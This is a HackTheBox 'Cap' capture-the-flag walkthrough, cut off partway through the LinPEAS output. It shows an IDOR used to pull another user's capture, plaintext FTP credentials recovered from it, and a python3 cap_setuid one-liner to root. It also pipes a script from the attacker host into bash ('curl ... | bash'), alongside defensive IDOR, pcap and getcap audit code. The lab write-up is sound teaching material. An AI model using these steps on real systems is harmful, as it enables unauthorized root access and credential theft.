No.5--HackTheBox--Cap

HackTheBox--Cap

Linux

Difficulty: Easy

Cap is an easy Linux machine running an HTTP server that performs administrative functions, including running network captures. Improper access control leads to an Insecure Direct Object Reference (IDOR), which allows access to another user's capture. That capture contains plaintext credentials that can be used to gain a foothold. Linux capabilities are then abused to escalate to root.


Walkthrough

Scanning

Three open TCP ports were found: 21, 22 and 80

┌──(kali㉿kali)-[~]
└─$ nmap -sV -sC 10.129.235.149                
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-06 22:30 EST
Stats: 0:01:21 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 22:32 (0:00:39 remaining)
Nmap scan report for 10.129.235.149
Host is up (0.37s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn
|_http-server-header: gunicorn
|_http-title: Security Dashboard
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Thu, 07 Nov 2024 03:30:56 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Thu, 07 Nov 2024 03:30:48 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="/static/css/themify-icons.css">
|     <link rel="stylesheet" href="/static/css/metisMenu.css">
|     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="/static/css/slicknav.min.css">
|     <!-- amchar
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Thu, 07 Nov 2024 03:30:49 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: OPTIONS, HEAD, GET
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     <html>
|     <head>
|     <title>Bad Request</title>
|     </head>
|     <body>
|     <h1><p>Bad Request</p></h1>
|     Invalid HTTP Version &#x27;Invalid HTTP Version: &#x27;RTSP/1.0&#x27;&#x27;
|     </body>
|_    </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 156.67 seconds
                                                                

In penetration testing and network scanning, TCP ports are usually the main focus, for the following reasons:

1. TCP is more commonly used for reliable services and applications

  • Most common network services (HTTP, HTTPS, SSH, FTP, SMTP and so on) run over TCP. TCP provides connection-oriented communication and guarantees that data arrives in order and without loss, which suits the reliability requirements of many application-layer protocols.

  • During a penetration test we mostly look for vulnerabilities in these services, so TCP ports get most of the attention. Web applications, databases and remote-login protocols, for example, all run on TCP ports.

2. UDP port scanning is more complicated

  • UDP is connectionless and has no three-way handshake, so it is hard to tell whether a target port is really open. UDP port scans are usually slow, are easily affected by firewalls dropping or filtering packets, and their results are less reliable.

  • Scanning UDP ports requires sending protocol-specific probes and waiting for an application-layer response, which makes the scan slow and the results unstable, with a high rate of false negatives. Initial enumeration therefore usually starts with TCP ports.

3. TCP scans are faster and more thorough

  • Nmap's TCP scans (such as the -sS SYN scan) are very efficient: they quickly detect open TCP ports and are less likely to trigger alerts. Because TCP scanning is faster and more reliable, it gives a picture of the network's services sooner.

  • Under the time limits of the OSCP exam or a real engagement, finding as many exploitable services as quickly as possible is key, so TCP ports come first.

4. TCP offers a larger attack surface

  • TCP services usually involve rich interaction and authentication steps and more complex protocol implementations, so they are more likely to contain vulnerabilities. SQL injection, RCE (remote code execution) and authentication bypasses, for example, mostly occur in services running over TCP.

  • UDP is typically used for simple, low-overhead services (DNS, SNMP, NTP), whose attack surface is comparatively limited and harder to exploit. Testers therefore concentrate their time on the TCP services that are likely to offer more opportunities.


Try anonymous login to the FTP service on port 21

Rejected

ftp 10.129.235.149
Connected to 10.129.235.149.
220 (vsFTPd 3.0.3)
Name (10.129.235.149:kali): anonymous
331 Please specify the password.
Password: 
530 Login incorrect.
ftp: Login failed

Visit the HTTP service on port 80

According to the nmap scan, the HTTP service is served by gunicorn

Clicking Security Snapshot (5 Second PCAP + Analysis) in the left-hand menu shows a snapshot

Click Download to fetch the capture and open it in Wireshark; it contains nothing useful

Note:
Every click on Security Snapshot (5 Second PCAP + Analysis) produces a new URL,

so we can try the path /data/0 to check whether there is an earlier snapshot generated by another user.


Insecure Direct Object Reference (IDOR)

In an IDOR vulnerability, an attacker manipulates the URL or parameters of a request to access objects they are not meant to access. These bugs look trivial but are found everywhere (for example the US Department of Defense, political party websites, ZenDesk and Parler).
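As an added illustration (not code from the box or from this page), a minimal model of the capture-download lookup behind /data/<id>: the vulnerable lookup selects a capture by its sequential number alone, while the hardened version keys captures by an unguessable token and checks ownership before returning anything. The store, its method names and the paths are assumptions.

```python
import secrets
from dataclasses import dataclass


@dataclass
class Capture:
    owner: str        # user who requested the snapshot
    pcap_path: str    # where the capture file lives on disk


class CaptureStore:
    """Models the snapshot store behind /data/<id> (hypothetical, not the real app)."""

    def __init__(self):
        self._by_seq = {}     # sequential ids, as the vulnerable endpoint appears to use
        self._by_token = {}   # random ids used by the hardened endpoint
        self.denied = []      # audit log of refused lookups, a hook for detection

    def create(self, owner, pcap_path):
        seq = len(self._by_seq)                  # 0, 1, 2, ... trivially guessable
        token = secrets.token_urlsafe(16)        # 128 bits of randomness, not guessable
        cap = Capture(owner, pcap_path)
        self._by_seq[seq] = cap
        self._by_token[token] = cap
        return seq, token

    def get_vulnerable(self, requesting_user, seq):
        # IDOR: the id alone selects the object; requesting_user is never consulted,
        # so /data/0 hands one user's capture to anybody who tries the number.
        return self._by_seq.get(seq)

    def get_fixed(self, requesting_user, token):
        cap = self._by_token.get(token)
        if cap is None or cap.owner != requesting_user:
            # Same answer for "does not exist" and "not yours": no enumeration oracle,
            # and the attempt is recorded so repeated probing stands out in the logs.
            self.denied.append((requesting_user, token))
            return None
        return cap


def demo():
    """Run both lookups against two users' captures and return what each one yields."""
    store = CaptureStore()
    nathan_seq, nathan_token = store.create("nathan", "/captures/0.pcap")
    store.create("guest", "/captures/1.pcap")
    leaked = store.get_vulnerable("guest", nathan_seq)     # succeeds: the IDOR
    blocked = store.get_fixed("guest", nathan_token)       # None: ownership enforced
    allowed = store.get_fixed("nathan", nathan_token)      # the owner still gets it
    return leaked, blocked, allowed, store.denied
```

The ownership check is what closes the IDOR; the random token only removes the ability to enumerate ids, and is no substitute for the check.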


Sure enough, a different resource is found there

Download it

Open it in Wireshark

A username and password are obtained

36    4.126500    192.168.196.1    192.168.196.16    FTP    69    Request: USER nathan

40    5.424998    192.168.196.1    192.168.196.16    FTP    78    Request: PASS Buck3tH4TF0RM3!


Useful Wireshark search features

1. Use protocol display filters

ftp.request.command == "USER" || ftp.request.command == "PASS"
http.request.method == "POST"
smtp.req.parameter == "AUTH" || pop.request.command == "USER" || pop.request.command == "PASS"

2. Search for a string

Edit > Find Packet, with the search type set to String
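The display filters above find the USER/PASS commands interactively; as an added example (not from the original page), the following script performs the same check over a pcap file offline, which is useful for auditing captures for cleartext logins before they are stored or shared. It parses the classic libpcap format directly with the standard library, builds a small constructed capture inline (addresses from the page, password a placeholder), and redacts the PASS argument in its report.

```python
import struct

FTP_CONTROL_PORT = 21


def _tcp_frame(payload, src_ip, dst_ip, src_port=50000, dst_port=FTP_CONTROL_PORT):
    """Build one Ethernet/IPv4/TCP frame carrying `payload` (constructed test data)."""
    eth = b"\x00" * 12 + b"\x08\x00"                        # dst mac, src mac, EtherType IPv4
    tcp = struct.pack("!HHIIBBHHH", src_port, dst_port, 1, 1,
                      5 << 4, 0x18, 65535, 0, 0)             # 20-byte header, PSH+ACK, no checksum
    total_len = 20 + len(tcp) + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64, 6, 0,
                     bytes(map(int, src_ip.split("."))), bytes(map(int, dst_ip.split("."))))
    return eth + ip + tcp + payload


def build_pcap(frames):
    """Wrap frames in a classic little-endian libpcap file (link type 1 = Ethernet)."""
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)]
    for ts, frame in enumerate(frames):
        out.append(struct.pack("<IIII", ts, 0, len(frame), len(frame)))
        out.append(frame)
    return b"".join(out)


def iter_frames(pcap):
    """Yield raw frames from a classic pcap file, honouring its byte order."""
    (magic,) = struct.unpack_from("<I", pcap, 0)
    endian = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(magic)
    if endian is None:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    (linktype,) = struct.unpack_from(endian + "I", pcap, 20)
    if linktype != 1:
        raise ValueError("only Ethernet captures are handled here")
    off = 24
    while off + 16 <= len(pcap):
        _sec, _usec, incl_len, _orig_len = struct.unpack_from(endian + "IIII", pcap, off)
        off += 16
        yield pcap[off:off + incl_len]
        off += incl_len


def find_cleartext_ftp_logins(pcap):
    """Return (src, dst, command, argument) for FTP USER/PASS commands; PASS is redacted."""
    findings = []
    for frame in iter_frames(pcap):
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":    # IPv4 only
            continue
        ip_off = 14
        ihl = (frame[ip_off] & 0x0F) * 4
        (total_len,) = struct.unpack_from("!H", frame, ip_off + 2)
        if frame[ip_off + 9] != 6:                             # not TCP
            continue
        tcp_off = ip_off + ihl
        src_port, dst_port = struct.unpack_from("!HH", frame, tcp_off)
        if dst_port != FTP_CONTROL_PORT:
            continue
        data_off = (frame[tcp_off + 12] >> 4) * 4
        payload = frame[tcp_off + data_off:ip_off + total_len]  # ignore Ethernet padding
        src = ".".join(str(b) for b in frame[ip_off + 12:ip_off + 16])
        dst = ".".join(str(b) for b in frame[ip_off + 16:ip_off + 20])
        for line in payload.split(b"\r\n"):
            cmd, _, arg = line.decode("ascii", "replace").partition(" ")
            cmd = cmd.upper()
            if cmd == "USER":
                findings.append((src, dst, cmd, arg))
            elif cmd == "PASS":
                findings.append((src, dst, cmd, "<redacted>"))  # never copy secrets into reports
    return findings


# Constructed sample capture mirroring the FTP exchange seen in the box's snapshot
# (addresses from the page; the password is a placeholder, not the real one).
SAMPLE_PCAP = build_pcap([
    _tcp_frame(b"USER nathan\r\n", "192.168.196.1", "192.168.196.16"),
    _tcp_frame(b"PASS not-the-real-password\r\n", "192.168.196.1", "192.168.196.16"),
    _tcp_frame(b"GET / HTTP/1.1\r\n\r\n", "192.168.196.1", "192.168.196.16", dst_port=80),
])

if __name__ == "__main__":
    for hit in find_cleartext_ftp_logins(SAMPLE_PCAP):
        print(hit)
```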


Getting the first flag

Log in to the FTP service with the recovered username and password

The target txt file is found


Try logging in on port 22

The same username and password log in directly,

but without root privileges

ssh nathan@10.129.235.149
nathan@10.129.235.149's password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Nov  7 07:42:37 UTC 2024

  System load:           0.0
  Usage of /:            36.8% of 8.73GB
  Memory usage:          22%
  Swap usage:            0%
  Processes:             228
  Users logged in:       0
  IPv4 address for eth0: 10.129.235.149
  IPv6 address for eth0: dead:beef::250:56ff:feb0:2cd8

  => There are 4 zombie processes.

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Thu Nov  7 05:45:44 2024 from 10.10.14.38
nathan@cap:~$ ls
user.txt
nathan@cap:~$ cd ..
nathan@cap:/home$ cd ..
nathan@cap:/$ cd root
-bash: cd: root: Permission denied

Privilege escalation

Manual search

nathan@cap:/$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep

Breakdown of the command

  • getcap: a Linux command that displays the capabilities set on files. Capabilities are Linux's fine-grained privilege mechanism: they split the traditional all-or-nothing root privilege into many small units that can be granted individually to programs or files. A program can, for example, be allowed to bind to a low-numbered port without holding full root privileges.

  • -r: getcap's recursive option, which scans the given directory and all of its subdirectories. Here -r / means starting from the root directory, i.e. searching the whole filesystem for files carrying capabilities.

  • /: the root directory, i.e. the very top of the filesystem. Since we want to find every file with capabilities on the system, recursing from / is the most thorough approach.

  • 2>/dev/null: a redirection that discards standard error. Scanning from the root directory hits many files and directories we lack permission to read, each of which produces an error message; redirecting them to /dev/null keeps them off the screen.


Capabilities to pay special attention to

  • cap_setuid: lets a process change its user ID. If an interpreter (Python, Perl) or an editor such as vim or nano carries this capability, it can usually be used to escalate privileges directly.

  • cap_net_bind_service: allows binding to ports below 1024, which normally only root can do. It does not lead to privilege escalation by itself, but in some environments it can assist an attack (for example running a rogue web service on a privileged port).

  • cap_sys_admin: allows many privileged operations such as mounting filesystems and starting or stopping system services. Binaries with this capability are high-value targets.
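As an added example (not from this page or from LinPEAS), the following parses getcap -r output such as the lines above and flags capabilities that are actually permitted to the binary. The flag letters are e = effective (active as soon as the program starts), p = permitted (usable by the process) and i = inheritable, so "+eip" on python3.8 means cap_setuid is live at exec; a capability without p is skipped because the process can never use it. The HIGH_RISK set is my own selection around the two the text singles out, and the example-tool line is a constructed placeholder showing the newer getcap output style.

```python
import re

# One clause of a getcap capability string: "cap_a,cap_b" + op + flags,
# e.g. "cap_setuid,cap_net_bind_service+eip"
CLAUSE = re.compile(r"^([a-z0-9_,]+)([+=-])([eip]*)$")

# Capabilities that, on a binary an unprivileged user can run, are commonly enough to reach root.
# Assumption: my selection, extending the two the text singles out (cap_setuid, cap_sys_admin).
HIGH_RISK = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module",
    "cap_dac_override", "cap_dac_read_search", "cap_chown", "cap_fowner",
}


def parse_getcap_line(line):
    """Parse one getcap line into (path, {capability: set(flag letters)}).

    Handles both output styles: "path = caps+flags" (older libcap, as on this box)
    and "path caps=flags" (newer libcap).
    """
    line = line.strip()
    if not line:
        return None
    if " = " in line:
        path, capstr = line.split(" = ", 1)
    else:
        path, _, capstr = line.rpartition(" ")
    caps = {}
    for clause in capstr.split():
        m = CLAUSE.match(clause)
        if m is None:
            raise ValueError(f"unrecognised capability clause {clause!r} in {line!r}")
        names, op, flags = m.groups()
        for name in names.split(","):
            current = caps.setdefault(name, set())
            if op == "=":            # assign exactly these flag sets
                current.clear()
                current.update(flags)
            elif op == "+":          # add to the listed sets
                current.update(flags)
            else:                    # "-": remove from the listed sets
                current.difference_update(flags)
    return path, caps


def audit_getcap(output):
    """Return (path, capability, flags, level) for every permitted file capability.

    level is "high" for capabilities in HIGH_RISK and "info" otherwise.
    """
    findings = []
    for line in output.splitlines():
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps = parsed
        for name, flags in caps.items():
            if "p" not in flags:     # not permitted: the process cannot use it
                continue
            level = "high" if name in HIGH_RISK else "info"
            findings.append((path, name, "".join(sorted(flags)), level))
    return findings


# Constructed input reproducing the getcap output shown on this page, plus one
# placeholder line in the newer "path caps=flags" style.
SAMPLE_GETCAP = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/sbin/example-tool cap_sys_admin=ep
"""

if __name__ == "__main__":
    for path, cap, flags, level in audit_getcap(SAMPLE_GETCAP):
        print(f"{level:4} {path} {cap}+{flags}")
```

Running this as a periodic check (and diffing against a known-good baseline) catches a setuid-capable interpreter like the python3.8 above the moment it appears.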


Escalating with python3.8

cap_setuid,cap_net_bind_service+eip

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

-c: execute the code that follows directly

Root obtained; get the flag

nathan@cap:/$ python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
root@cap:/# 
root@cap:/# ls
bin  boot  cdrom  dev  etc  home  lib  lib32  lib64  libx32  lost+found  media  mnt  opt  proc  root  run  sbin  snap  srv  sys  tmp  usr  var
root@cap:/# cd root
root@cap:/root# ls
root.txt  snap

Searching with the LinPEAS script

Download linpeas.sh to the attacking machine: Release refs/heads/master 20241101-6f46e855 · peass-ng/PEASS-ng

Start a web server on the attacking machine

python3 -m http.server 80

From the SSH session on the target, download the script and pipe it straight into bash

curl http://10.10.14.38/linpeas.sh | bash
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0  808k    0  3984    0     0   5740      0  0:02:24 --:--:--  0:02:24  5732



    /---------------------------------------------------------------------------------\
    |                             Do you like PEASS?                                  |                                                                                                       
    |---------------------------------------------------------------------------------|                                                                                                       
    |         Get the latest version    :     https://github.com/sponsors/carlospolop |                                                                                                       
    |         Follow on Twitter         :     @hacktricks_live                        |                                                                                                       
    |         Respect on HTB            :     SirBroccoli                             |                                                                                                       
    |---------------------------------------------------------------------------------|                                                                                                       
    |                                 Thank you!                                      |                                                                                                       
    \---------------------------------------------------------------------------------/                                                                                                       
          LinPEAS-ng by carlospolop                                                                                                                                                           
                                                                                                                                                                                              
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.                                                                                                  
                                                                                                                                                                                              
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
 LEGEND:                                                                                                                                                                                      
  RED/YELLOW: 95% a PE vector
  RED: You should take a look to it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) 
  LightMagenta: Your username

 Starting LinPEAS. Caching Writable Folders...
                               ╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════                                                                                                           
                               ╚═══════════════════╝                                                                                                                                          
OS: Linux version 5.4.0-80-generic (buildd@lcy01-amd64-030) (gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)) #90-Ubuntu SMP Fri Jul 9 22:49:44 UTC 2021
User & Groups: uid=1001(nathan) gid=1001(nathan) groups=1001(nathan)
Hostname: cap

[+] /usr/bin/ping is available for network discovery (LinPEAS can discover hosts, learn more with -h)
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (LinPEAS can discover hosts, scan ports, and forward ports. Learn more with -h)                       
[+] /usr/bin/nc is available for network discovery & port scanning (LinPEAS can discover hosts and scan ports, learn more with -h)                                                            
                                                                                                                                                                                              

 32  808k   32  265k    0     0  24121      0  0:00:34  0:00:11  0:00:23 24121DONEing directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
                                                                                                                                                                                              
 45  808k   45  365k    0     0  28767      0  0:00:28  0:00:13  0:00:15 28767                              ╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════                                                                                                            
                              ╚════════════════════╝                                                                                                                                          
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits                                                                                                            
Linux version 5.4.0-80-generic (buildd@lcy01-amd64-030) (gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)) #90-Ubuntu SMP Fri Jul 9 22:49:44 UTC 2021                                         
Distributor ID: Ubuntu
Description:    Ubuntu 20.04.2 LTS
Release:        20.04
Codename:       focal

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version                                                                                                               
Sudo version 1.8.31                                                                                                                                                                           


╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses                                                                                                       
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin                                                                                            

╔══════════╣ Date & uptime
Thu Nov  7 14:05:59 UTC 2024                                                                                                                                                                  
 14:05:59 up 10:43,  1 user,  load average: 0.30, 0.07, 0.02

╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices                                                                                                                                                     
/dev/disk/by-id/dm-uuid-LVM-2om9fd1B3Q2r7E8yJyxwbZF4JCSUIQCqYgbAERHfSMVI2q5K9TyUTeGzFxbyZN4a / ext4 defaults 0 0                                                                              
/dev/disk/by-uuid/d3d1cf9e-20c6-450f-b152-9854f6a804ad /boot ext4 defaults 0 0
/dev/sda4       none    swap    sw      0       0
proc    /proc   proc    defaults,hidepid=2      0       0

╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk                                                                                                                                                                                          
sda
sda1
sda2
sda3
sda4

╔══════════╣ Environment
╚ Any private information inside environment variables?                                                                                                                                       
SHELL=/bin/bash                                                                                                                                                                               
PWD=/home/nathan
LOGNAME=nathan
XDG_SESSION_TYPE=tty
MOTD_SHOWN=pam
HOME=/home/nathan
LANG=C.UTF-8
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
SSH_CONNECTION=10.10.14.38 58020 10.129.235.149 22
LESSCLOSE=/usr/bin/lesspipe %s %s
XDG_SESSION_CLASS=user
TERM=xterm-256color
LESSOPEN=| /usr/bin/lesspipe %s
USER=nathan
SHLVL=1
XDG_SESSION_ID=17
XDG_RUNTIME_DIR=/run/user/1001
SSH_CLIENT=10.10.14.38 58020 22
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1001/bus
SSH_TTY=/dev/pts/0
_=/usr/bin/env

╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed                                                                                        
dmesg Not Found                                                                                                                                                                               
                                                                                                                                                                                              
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester                                                                                                                                            
[+] [CVE-2022-2586] nft_object UAF                                                                                                                                                            

   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: probable
   Tags: [ ubuntu=(20.04) ]{kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: probable
   Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2017-5618] setuid screen v4.5.0 LPE

   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154


Vulnerable to CVE-2021-3560

╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.                                                                                                 
apparmor module is loaded.
═╣ AppArmor profile? .............. unconfined
═╣ is linuxONE? ................... s390x Not Found
═╣ grsecurity present? ............ grsecurity Not Found                                                                                                                                      
═╣ PaX bins present? .............. PaX Not Found                                                                                                                                             
═╣ Execshield enabled? ............ Execshield Not Found                                                                                                                                      
═╣ SELinux enabled? ............... sestatus Not Found                                                                                                                                        
═╣ Seccomp enabled? ............... disabled                                                                                                                                                  
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... enabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (vmware)                                                                                                                                              

                                   ╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════                                                                                                           
                                   ╚═══════════╝                                                                                                                                              
╔══════════╣ Container related tools present (if any):
/snap/bin/lxc                                                                                                                                                                                 
╔══════════╣ Container details
═╣ Is this a container? ........... No                                                                                                                                                        
═╣ Any running containers? ........ No                                                                                                                                                        
                                                                                                                                                                                              

                                     ╔═══════╗
